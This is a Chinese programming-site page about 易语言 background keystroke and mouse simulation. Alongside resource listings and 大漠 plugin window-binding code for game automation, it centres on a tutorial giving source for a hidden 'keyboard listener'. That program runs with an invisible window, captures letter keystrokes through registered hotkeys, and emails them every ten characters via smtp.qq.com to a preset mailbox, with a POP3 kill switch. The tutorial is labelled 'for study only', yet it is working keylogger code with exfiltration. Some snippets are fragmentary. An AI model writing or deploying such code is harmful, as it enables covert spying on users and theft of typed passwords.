精华内容
下载资源
问答
  • 易语言初心者后台按键源码,初心者后台按键,按键了,加密转换键码,十到十六,MD5演示函数_取十六进制文本,十六到十,去除首部零,键码转换,发送系统消息
  • 易语言后台按键模拟源码,后台按键模拟,MakeKeyLparam,十六进制到十进制,子程序_其他进制到十进制,PostMessage,MapVirtualKey
  • 易语言 键盘鼠标后台操作模块
  • 易语言后台按键源码.rar

    热门讨论 2011-02-11 22:00:47
    很简单的后台按键源码 适合新手看 自己做的 高手别见笑
  • 易语言postmessage学习例程源码,postmessage学习例程,PostMessage,发送消息ALT加F4,发送消息ALT加空格,发送消息ALT加字母,发送消息输入字符,发送消息_,API_CallWindowProc,API_SetWindowLong,MakeKeyLparam,十六进制...
  • 易语言鼠标后台点击源码 (1).zip 鼠标后台点击代码,安全,简洁,小巧,实用
  • 适合DNF,你知道的,别人我不轻易给他的
  • 基于易语言键盘监听器(仅供学习)软件原理梳理输入内容检测部分发送部分结束部分准备工作邮箱准备支持库准备模块准备窗口准备代码部分程序集启动窗口创建完毕子程序1编辑框1内容被改变子程序2总结 软件原理 梳理 ...

    软件原理

    梳理

    程序的运行分为三个部分:检测部分、发送部分和结束部分。

    输入内容检测部分

    在后台创建一个进程,利用 “枫式热键” 模块,实时监测运行电脑的键盘输入内容,并保存于程序窗口中的一个编辑框内,进行暂时储存,一旦到达指定的暂存字数时,发送编辑框内容到指定邮箱,实现全窗口键盘监听。

    发送部分

    用易语言所带的互联网库中的发送邮件命令,发送到指定邮箱编辑框中的内容。

    结束部分

    为了避免发送的邮件太多了,设置一个收到邮件就立马结束的命令,利用邮件接收库的命令,设置判断标题和内容是否与设置的相符,如果相符,立即结束程序的运行。

    准备工作

    邮箱准备

    申请邮箱的POP3/SMTP服务,把生成的秘钥记录下来备用。

    支持库准备

    在易语言工具→支持库配置→在“互联网支持库”和“邮件接收支持库”前面选中→确定。

    模块准备

    准备“枫式热键”模块(如果实在想要可以留下邮箱)并导入工程中。

    窗口准备

    制作好易语言的窗口,像图片里的这样。
    ↓↓↓↓↓↓↓↓↓↓↓
    在这里插入图片描述
    在窗口属性里设置可视为假,按下Esc关闭为假,窗口顶置为假。

    代码部分

    程序集

    .版本 2
    .支持库 pop3
    
    .程序集 窗口程序集1
    .程序集变量 a
    .程序集变量 收信账号, 文本型
    .程序集变量 发信账号, 文本型
    .程序集变量 发信密码, 文本型
    .程序集变量 邮件信息, 邮件信息
    

    启动窗口创建完毕

    .版本 2
    .支持库 internet
    .支持库 pop3
    .支持库 spec
    
    .子程序 __启动窗口_创建完毕
    .局部变量 s1, 整数型
    .局部变量 a1, 整数型, , "0"
    .局部变量 s
    .局部变量 c
    
    发信账号 = “  ”
    发信密码 = “  ”
    收信账号 = “  ”
    连接发信服务器 (“smtp.qq.com”, 25, 发信账号, 发信密码, )
    发送邮件 (“键盘监听”, “已成功连接”, 收信账号, , , 发信账号, )
    .如果真 (连接收信服务器 (“pop.qq.com”, 110, 发信账号, 发信密码, 30000, 3))
        子程序2 ()
    .如果真结束
    
    调试输出 (到字节集 (“s”), 到字节集 (“z”), #A键)
    s1 = 97
    .计次循环首 (26, c)
        调试输出 (s1)
        s = s1 - 32
        清除数组 (a1)
        加入成员 (a1, s)
        注册热键 (a1, &子程序1, , 到文本 (到字节集 (到字节 (s1))))
        s1 = s1 + 1
    .计次循环尾 ()
    

    程序中是以QQ邮箱作为例子,其他的邮箱可以自行更改服务器,更改方法请自行查阅 “传送门”。

    子程序1

    .版本 2
    .支持库 spec
    
    .子程序 子程序1
    .参数 z, 文本型
    .参数 x, 整数型
    
    调试输出 (z, x)
    .如果 (x = 1)
        a = a + 1
        编辑框1.加入文本 (z)
    

    编辑框1内容被改变

    .版本 2
    .支持库 internet
    
    .子程序 _编辑框1_内容被改变
    
    .如果 (取文本长度 (编辑框1.内容) ≥ 10)
        发送邮件 (“键盘监听”, “输入信息:” + 编辑框1.内容, 收信账号, , , 发信账号, )
        编辑框1.内容 = “”
    
    .否则
    

    子程序2

    版本 2
    .支持库 pop3
    
    .子程序 子程序2
    .局部变量 邮件数, 整数型
    .局部变量 变量, 整数型
    
    获取邮件信息 (邮件数, 变量)
    .计次循环首 (邮件数, 变量)
        邮件信息 = 接收邮件 (变量)
        .如果 (邮件信息.取主题 () = “键盘监听”)
            .如果 (邮件信息.取文本内容 () = “结束”)
                结束 ()
    
            .否则
    
            .如果结束
    
        .否则
    
        .如果结束
    
    .计次循环尾 ()
    

    总结

    到现在,所有的内容也就全部告诉大家了。再次声明,本文章仅供学习

    毕竟这是博主第一次发文章,请大家多多指教,我还是会继续努力的。

    喜欢的朋友记得多多转发评论,你们的支持就是我前进的动力!

    展开全文
  • 易语言源码后台_按组合键 - 向指定句柄发送后台组合键 驱动过保护,二叉树,自动化脚本功能, 易语言按键,易语言封包技术。
  • 易语言发送组合按键消息源码,发送组合按键消息,发送消息ALT加F4,发送消息ALT加空格,发送消息ALT加字母,发送消息输入字符,发送消息_,API_CallWindowProc,API_SetWindowLong
  • 易语言后台暗码监控源码,后台暗码监控,键盘钩子回调,反馈事件,API_安装系统钩子,API_释放系统钩子,API_拷贝内存,API_取实例句柄
  • 资源介绍:DX编程 - 键盘方向键控制人物行走易语言源码资源作者:易语言游戏源码大全资源界面:资源下载:
  • F1 自动按键 模拟 后台
  • 本支持库移植自按键精灵的后台键盘鼠标插件,用于游戏周边程序功能操作。 操作系统支持: Windows
  • 易语言 键盘鼠标后台操作模块 方便后台操作 易语言 键盘鼠标后台操作模块 方便后台操作易语言 键盘鼠标后台操作模块 方便后台操作易语言 键盘鼠标后台操作模块 方便后台操作易语言 键盘鼠标后台操作模块 方便后台...
  • 易语言游戏后台同步按键源码

    热门讨论 2011-11-26 10:12:49
    易语言游戏后台同步按键源码 源码哦 原创 要的拿走吧,机会不都哦
  • 寂寞的牧马[上传] QQ:190160401 邮箱:byjimo@163.com 易语言按键模拟源码!一定要顶啊!
  • 二种方法驱动键盘按键与鼠标点击。有需要的拿走吧。里面有例程。
  • 其中BackInC汇编调用的驱动,可以支持usb键盘win7 32位 xp 32位测试成功,其他自测调用方式打包成模块了,写了个简单的例子下图为工商安全控件模拟输入。我试了农业银行的,安全级别真高,输入了一半就提示驱动错误...
  • 易语言大漠后台模式判断

    千次阅读 2020-06-04 09:14:24
    后台识别绑定游戏窗口,这里采用鼠标指向目标窗口获取鼠标所在窗口的句柄,这里这是示范一种方法,其实我们可以通过进程枚举,标题枚举,等等方式来获取窗口句柄便于绑定,也可以使用一些后台绑定测试工具来确定它的...

    后台识别绑定BindWindow游戏窗口,这里采用鼠标指向目标窗口获取鼠标所在窗口的句柄,这里这是示范一种方法,其实我们可以通过进程枚举,标题枚举,等等方式来获取窗口句柄便于绑定,也可以使用一些后台绑定测试工具来确定它的后台模式,在遮盖游戏窗口的情况下,能通过Capture截图成功,说明它的后台图色模式就是对的,然后再去判断,鼠标模式,键盘模式,当然在所有模式失败的情况可以试试BindWindowEX命令,功能更强大。

    句柄获取:
    hwnd = dm.GetMousePointWindow()
    hwnd = dm.FindWindow (“”, “剑侠情缘•网络版”)
    绑定窗口:
    long BindWindow(hwnd,display,mouse,keypad,mode)
    示例:

     
    // display: 前台 鼠标:前台键盘:前台 模式0
    dm_ret = dm.BindWindow(hwnd,"normal","normal","normal",0)
    // display: gdi 鼠标:前台 键盘:前台 模式1
    dm_ret = dm.BindWindow(hwnd,"gdi","normal","normal",1)
    // display: dx 鼠标:前台 键盘:前台 模式0
    dm_ret = dm.BindWindow(hwnd,"dx","normal","normal",0)
    // display: dx 鼠标:windows后台 键盘:windows后台 模式1
    dm_ret = dm.BindWindow(hwnd,"dx","windows","windows",1)
    // display: dx 鼠标:dx 后台 键盘: dx后台 模式1
    dm_ret = dm.BindWindow(hwnd,"dx","dx","dx",1) 
    // display: dx 鼠标:windows3后台 键盘:windows后台 模式1
    dm_ret = dm.BindWindow(hwnd,"dx","windows3","windows",1)
    后台模式判断:dm_ret = dm.Capture(0,0,2000,2000,"screen.bmp")
    解除绑定:dm_ret = dm.UnBindWindow()

    源码:511遇见易语言大漠后台模式判断

    展开全文
  • 易语言简单屏蔽鼠标按键源码系统结构:易语言简单屏蔽鼠标按键源码,简单屏蔽鼠标按键 ======窗口程序集1 || ||------_时钟1_周期事件 || ||------_编辑框1_内容被改变 || ||------__启动窗口_可否
  • 易语言键盘动作录制

    2013-02-03 13:37:12
    键盘动作后台录制! 次程序运用易语言制作的
  • 本节视频教程的命令有:...数值方法 (“SwitchBindWindow”, hwnd)) 源码:511遇见易语言大漠单多线程模块制作 易语言封装免注册免查杀大漠模块命令教程 易语言大漠单线程模块制作后台设置绑定窗口句柄

    本节视频教程的命令有:ForceUnBindWindow、GetBindWindow、IsBind、LockDisplay、LockInput、LockMouseRect、SetAero、SetDisplayDelay、SwitchBindWindow

    511遇见大漠模块制作

    视频教程模块源码

    .版本 2
    
    .子程序 ForceUnBindWindow, 整数型, 公开, 强制解除绑定窗口,并释放系统资源.ForceUnBindWindow(返回值:0失败,1成功)
    .参数 hwnd, 整数型, , 窗口句柄
    
    返回 (obj.数值方法 (“ForceUnBindWindow”, hwnd))
    
    .子程序 GetBindWindow, 整数型, 公开, 获取当前对象已经绑定的窗口句柄. 无绑定返回0GetBindWindow(返回值窗口句柄)
    
    返回 (obj.数值方法 (“GetBindWindow”, ))
    
    .子程序 IsBind, 整数型, 公开, 判定指定窗口是否已经被后台绑定. (前台无法判定)IsBind(返回值:0没绑定,或者窗口不存在,1已经绑定)
    .参数 hwnd, 整数型, , 窗口句柄
    
    返回 (obj.数值方法 (“IsBind”, hwnd))
    
    .子程序 LockDisplay, 整数型, , 锁定指定窗口的图色数据(不刷新).LockDisplay(返回值:0失败,1成功)
    .参数 lock, 整数型, , 0关闭锁定,1 开启锁定
    
    返回 (obj.数值方法 (“LockDisplay”, lock))
    
    .子程序 LockInput, 整数型, 公开, 禁止外部输入到指定窗口LockInput(返回值:0失败,1成功)
    .参数 lock, 整数型, , 0关闭锁定,1 开启锁定(键盘鼠标都锁定),2 只锁定鼠标,3 只锁定键盘,4 同1,5同3,详见接口说明
    
    返回 (obj.数值方法 (“LockInput”, lock))
    
    .子程序 LockMouseRect, 整数型, 公开, 设置前台鼠标在屏幕上的活动范围.LockMouseRect(返回值:0失败,1成功)
    .参数 X1, 整数型, , 区域的左上X坐标. 屏幕坐标.
    .参数 Y1, 整数型, , 区域的左上Y坐标. 屏幕坐标.
    .参数 X2, 整数型, , 区域的右下X坐标. 屏幕坐标.
    .参数 Y2, 整数型, , 区域的右下Y坐标. 屏幕坐标.
    
    返回 (obj.数值方法 (“LockInput”, X1, Y1, X2, Y2))
    
    .子程序 SetAero, 整数型, 公开, 设置开启或者关闭系统的Aero效果. (仅对WIN7及以上系统有效)SetAero(返回值:0失败,1成功)
    .参数 enable, 整数型, , 0关闭,1开启
    
    返回 (obj.数值方法 (“SetAero”, enable))
    
    .子程序 SetDisplayDelay, 整数型, 公开, 设置dx截图最长等待时间。内部默认是3000毫秒. 一般用不到调整这个.SetDisplayDelay(返回值:0失败,1成功)
    .参数 time, 整数型, , 等待时间,单位是毫秒。 注意这里不能设置的过小,否则可能会导致截图失败,从而导致图色函数和文字识别失败.
    
    返回 (obj.数值方法 (“SetDisplayDelay”, time))
    
    .子程序 SwitchBindWindow, 整数型, 公开, 在不解绑的情况下,切换绑定窗口.(必须是同进程窗口)SwitchBindWindow(返回值:0失败,1成功)
    .参数 hwnd, 整数型, , 需要切换过去的窗口句柄
    
    返回 (obj.数值方法 (“SwitchBindWindow”, hwnd))

    源码:511遇见易语言大漠单多线程模块制作

              易语言封装免注册免查杀大漠模块命令教程

              易语言大漠单线程模块制作后台设置绑定窗口句柄

    展开全文
  • 易语言】投递窗口消息(后台按键)DLL命令 .版本 2 .DLL命令 投递消息, , , "PostMessageA", , 向指定窗口内坐标发送鼠标消息  .参数 hWnd, 整数型, , 接收消息的窗口句柄  .参数 Msg, 整数型,
      
    

    【易语言】投递窗口消息(后台按键)DLL命令

    .版本 2

    .DLL命令 投递消息, , , "PostMessageA", , 向指定窗口内坐标发送鼠标消息
        .参数 hWnd, 整数型, , 接收消息的窗口句柄
        .参数 Msg, 整数型, , WM_MOUSEFIRST = 512,WM_MOUSEMOVE = 512,// 移动鼠标,WM_LBUTTONDOWN = 513,//按下鼠标左键,WM_LBUTTONUP = 514,//释放鼠标左键,WM_LBUTTONDBLCLK = 515,//双击鼠标左键,WM_RBUTTONDOWN = 516,//按下鼠标右键,WM_RBUTTONUP = 517,//释放鼠标右键,WM_RBUTTONDBLCLK = 518,//双击鼠标右键,WM_MBUTTONDOWN = 519,//按下鼠标中键,WM_MBUTTONUP = 520,//释放鼠标中键,WM_MBUTTONDBLCLK = 521,/双击鼠标中键,WM_MOUSEWHEEL = 522当鼠标轮子转动时发送此消息个当前有焦点的控件
        .参数 wParam, 整数型, , 此参数能随意定义,正整数即可。
        .参数 lParam, 整数型, , 水平坐标 + 垂直坐标 × 65536
    展开全文
  • BindWindowEx后台绑定模式一绑定的一个高级命令,相对于BindWindow多了一个参数 public,也就是对公共属性 dx模式的设置方式。 511遇见大漠模块制作 官方BindWindowEx文档 函数简介: 绑定指定的窗口,并指定这个...
  • 易语言模块大全

    2018-08-07 13:01:30
    Tooltip31版[易语言3.0以上版本].ec Trackbar.ec TTS.EC TWnet.CN.EC URL编码解码.ec USER32.EC user32模块.EC user模块.EC USUAL.EC VERSION.EC WBCZ.EC WBFH.EC wf.ec WF1.EC WinAPI_窗口与组件.ec...
  • 绑定指定的窗口,并指定这个窗口的屏幕颜色获取方式,鼠标仿真模式,键盘仿真模式,以及模式设定,高级用户可以参考BindWindowEx更加灵活强大. 函数原型: long BindWindow(hwnd,display,mouse,keypad,mode) 参数定义:...
  • 易语言让按钮支持回车键操作

    千次阅读 2020-06-12 09:10:03
    易语言的按钮默认不支持回车键的,有就是说我们切换到按钮上时按回车键是没有作用的,必须鼠标左键点击。下面的两种方法我们当然选择第二种属性设置来实现。 方法一 代码实现 ...参考:易语言按钮支持回车键 ...
  • 第四课 511遇见易语言大漠后台模式判断 http://v.youku.com/v_show/id_XMjY2MDA3MDY3Mg==.html    没什么可说的 自己看接口手册就行    小知识:图色模式的判断  老师推荐的是    但是上面...

空空如也

空空如也

1 2 3 4 5 ... 9
收藏数 165
精华内容 66
关键字:

易语言后台键盘